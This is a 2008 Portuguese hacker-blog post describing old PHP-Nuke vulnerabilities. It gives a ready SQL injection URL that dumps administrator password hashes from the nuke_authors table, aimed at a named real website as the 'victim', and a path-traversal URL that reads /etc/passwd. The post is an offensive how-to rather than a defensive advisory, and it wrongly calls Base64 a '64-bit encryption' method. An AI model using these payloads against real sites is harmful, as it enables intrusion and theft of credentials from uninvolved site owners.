Comando Hackers & Crakers: Falha em Nuke-PHP

Primeiro vamos ver o que é Nuke-PHP.

O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso, principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.

Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários . Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.

Principais falhas:

Falha 1

-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits considerado pouco seguro.

O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de preferencia o IE)

Falha 2

-erro no arquivo "opendir.php"

(...)

$REQUEST_URI = strip_tags($REQUEST_URI);

$res = explode("$PHP_SELF?", $REQUEST_URI);

$odp_cat = $res[1];

if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);

(define $requesturl)

(...)

Pratica 1 :

Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.

código:

modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

Site ( vítima ):

http://www.abaga.com.br

Injection pronto:

http://www.abaga.com.br/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

Obseve as senhas criptografadas, basta um decripter.

pratica 2 :
Na segunda falha podemos usar o operdir.phpInocente demais operdir(abrir diretorio)

Basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:

http://www.sitecobaia.com.br/opendir.php?requesturl=/etc/passwd

-------------------------

Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas conhecidas.

Mas muita gente no passado instalou o nuke-PHP em seu site, o site funciona corretamente e por isto não são todos que atualizaram, e esquecem que atualização não corrige apenas erros de desempenho, mas de segurança também.

Links:

Para quem não conhece o Nuke-PHP
http://phpnuke.org/

Para quem quer estudar mais sobre o opendir.php

http://www.ewebsite.biz/modules.php?name=PHP_Manual&page=function.opendir.html

----------
Origem: http://insecuritynet.blogspot.com/2008/03/primeiro-vamos-ver-o-que-nuke-php.html

Comando Hackers & Crakers

sábado, 10 de maio de 2008

Falha em Nuke-PHP

Nenhum comentário:

O q vc está achando da BLOG??xD

As postagem do blog aew galera

Eu so esse daew

Max Cornelisse o maior hacker da Holanda causa engarrafamento levantando ponte elevadissa

Nickelback - If Everyone Cared -

Contador de visitas da paginas